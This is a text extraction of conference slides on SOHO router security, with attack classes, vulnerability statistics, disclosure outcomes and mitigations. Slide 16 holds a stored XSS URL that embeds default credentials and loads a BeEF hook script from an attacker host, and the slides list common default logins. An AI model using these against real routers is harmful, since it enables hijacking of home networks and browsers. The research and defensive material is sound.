Post on 12-Apr-2017
Swords & ShieldsSOHO Routers:
Álvaro Folgado, José Antonio Rodríguez, Iván Sanz
3
About us…
Meet our research groupÁlvaro Folgado RuedaIndependent Researcher
José Antonio Rodríguez GarcíaIndependent Researcher
Iván Sanz de CastroSecurity Analyst at Wise Security Global.
4
The talk
Mitigations
Vulnerabilities & Attacks
Keys
5
Real World Attacks Example 1 – Dictionary for DNS Hijacking via CSRF
6
Real World Attacks Example 2 – Phishing website
7
Real World Attacks Example 3 – Linux/Moose Malware
8
Common security problems Services
Too many. Mostly useless.□ Increases attack surfaces
Insecure
9
Common security problems Default credentials
Public and well-known for each model Non randomly generated Hardly ever modified by users
45%
27%
5%
5%
18% User / Password1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone
10
Common security problems Multiple user accounts
Also with public default credentials Mostly useless for users Almost always hidden for end-users
□ Passwords for these accounts are never changed
11
Swords
12
Bypass Authentication Allows unauthenticated attackers to carry out router
configuration changes Locally and remotely Exploits:
Improper file permissions: Web configuration interface Service misconfiguration: SMB and Twonky Media Server
Persistent DoS / Restore router to default settings without requiring authentication
Exploiting the Twonky Media Server
Video Demos #1 & #2
13
Cross Site Request Forgery Change any router configuration settings by sending
a specific malicious link to the victim Main goal
DNS Hijacking Requires embedding login credentials in the
malicious URL Attack feasible if credentials have never been changed Google Chrome does not pop-up warning
14
Cross Site Request Forgery Suspicious link, isn't it?
URL Shortening Services Create a malicious website
15
Persistent Cross Site Scripting Inject malicious script code within the web
configuration interface Goals
Session Hijacking Browser Infection
16
Persistent Cross Site Scripting Browser Exploitation Framework is a great help
Input field character length limitation BeEF hooks link to a more complex script file hosted by the
attackerhttp://1234:1234@192.168.1.1/goform?param=<script
src="http://NoIPDomain:3000/hook.js"></script>
17
Unauthenticated Cross Site Scripting Script code injection is performed locally without
requiring any login process Send a DHCP Request PDU containing the malicious
script within the hostname parameter The malicious script is injected within Connected
Clients (DHCP Leases) table
18
Unauthenticated Cross Site Scripting
19
Unauthenticated Cross Site Scripting Always try harder
20
Privilege Escalation User without administrator rights is able to escalate
privileges and become an administrator Shows why multiple user accounts are unsafe
Privilege Escalation via FTP
Video Demo #3
21
Backdoor Hidden administrator accounts Completely invisible to end users
But allows attackers to change any configuration setting
22
Information Disclosure Obtain critical information without requiring any
login process WLAN password Detailed list of currently connected clients Hints about router's administrative password Other critical configuration settings
23
Information Disclosure
24
Universal Plug and Play Enabled by default on several router models Allows application to execute network configuration
changes such as opening ports Extremely insecure protocol
Lack of an authentication process Awful implementations
Main goals Open critical ports for remote WAN hosts Persistent Denial of Service Carry out other configuration changes
25
Universal Plug and Play Locally
Miranda UPnP tool
26
Universal Plug and Play Remotely
Malicious SWF file
27
Attack vectors Locally
Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly
Remotely The attacker is outside of the victim's LAN
28
Social Engineering is your friend For link-based remote attacks
XSS, CSRF and UPnP Social Networks = Build the easiest botnet ever! Phishing emails = Targeted attacks
29
DNS Hijacking via CSRF
Live Demo #1
Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #2
Reflected XSS + client-side attack to get Reverse Shell
Live Demo #3
Bypass Authentication using SMB Symlinks
Live Demo #4
30
Using a Reflected Cross Site Scripting to get a Reverse Shell on victim's computer Exploits an Internet Explorer client-side vulnerability:
CVE-2012-1876
Live Demo #3: Details
31
Shields
32
Mitigations: End users Users start with a broken shield
Limited configuration settings Several attacks cannot be stopped Mitigations only work for specific models
Not as easy as buying a brand new router No antivirus is going to protect you
33
Mitigations: End users Where to start?
Identify your router model Look for router credentials Get into the advanced configuration interface
34
Mitigations: End users General recommendations
Only log into the web interface when needed□ Logout (if possible) / Wipe browser's cache after finishing
Change your router's administrative password
35
Mitigations: End users General recommendations
Check your DNS servers on a weekly basis
36
Mitigations: End users General recommendations
Do not trust shortened links Be careful when browsing the web interface
37
Mitigations: End users Multiple user accounts
Try to delete any other administrative account At least, change their passwords, if possible
38
Video Demo #4 Mitigating Privilege Escalation and
account-related attacks
39
Mitigations: End users Services
Disable any unused service if given the chance□ FTP and SMB□ Media Servers: Twonky□ UPnP□ If local risk, DHCP
It does not always work…
40
Mitigations: End users Firmware
Update to the latest version□ Manufacturer might have not fixed any issues
How?
41
Mitigations: End users Custom Firmware Images
For advanced users More configuration settings Might have security flaws as well
42
Mitigations: Manufacturers Listen to what security researchers have to say Do not include useless services
Specially for ISP SOHO routers At least, make it feasible to completely shut them down
Critical ports closed to WAN by default At least 21, 22, 23, 80 and 8000/8080
43
Mitigations: Manufacturers Do not include multiple user accounts Design a safer alternative to UPnP Avoid using unsafe protocols
HTTP. Telnet. FTP. HTTPS. SSH. SFTP. Randomly generate user credentials
Admin Password
Serial Number
MAC Address
Manufact. Date
44
Mitigations: Manufacturers XSS
Check every input field within router's web interface Sanitize DHCP hostname parameters Content Security Policies
45
Mitigations: Manufacturers CSRF
Tokens… that work
46
Mitigations: Manufacturers Bypass Authentication & Information Disclosure
Check for improper file permissions and public debug messages
Service-related Check for possible wrong service configuration (e.g.: FTP,
SMB)
47
Keys
48
Developed tools
49
Manufacturers' response Average 2-3 emails sent to each manufacturer
Most of them unreplied... 7 months later Number of vulnerabilities fixed: 0
50
Responsible Disclosure
51
Results More than 60 vulnerabilities have been discovered 22 router models affected 11 manufacturers affected
52
Amper
Astoria
Belkin
Comtrend
D-Link
Huawei
Links
ys
Netgear
Observa
T.
Sagemco
mZyx
el 0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per manufac-turer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers
53
21%
15%
20%8%
2%
3%
2%
6%
23%
XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities by types
54
Conclusion Has SOHO router security
improved? Hell NO! Serious security problems Easy to exploit With huge impact Millions of users affected
PLEASE, START FIXING SOHO ROUTER SECURITY
55
Álvaro Folgado Rueda · alvfolrue@gmail.comJosé A. Rodríguez García · joseantorodriguezg@gmail.com
Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com
Thank you!Q&A Time
https://cybercamp.es @CyberCampEs#CyberCamp15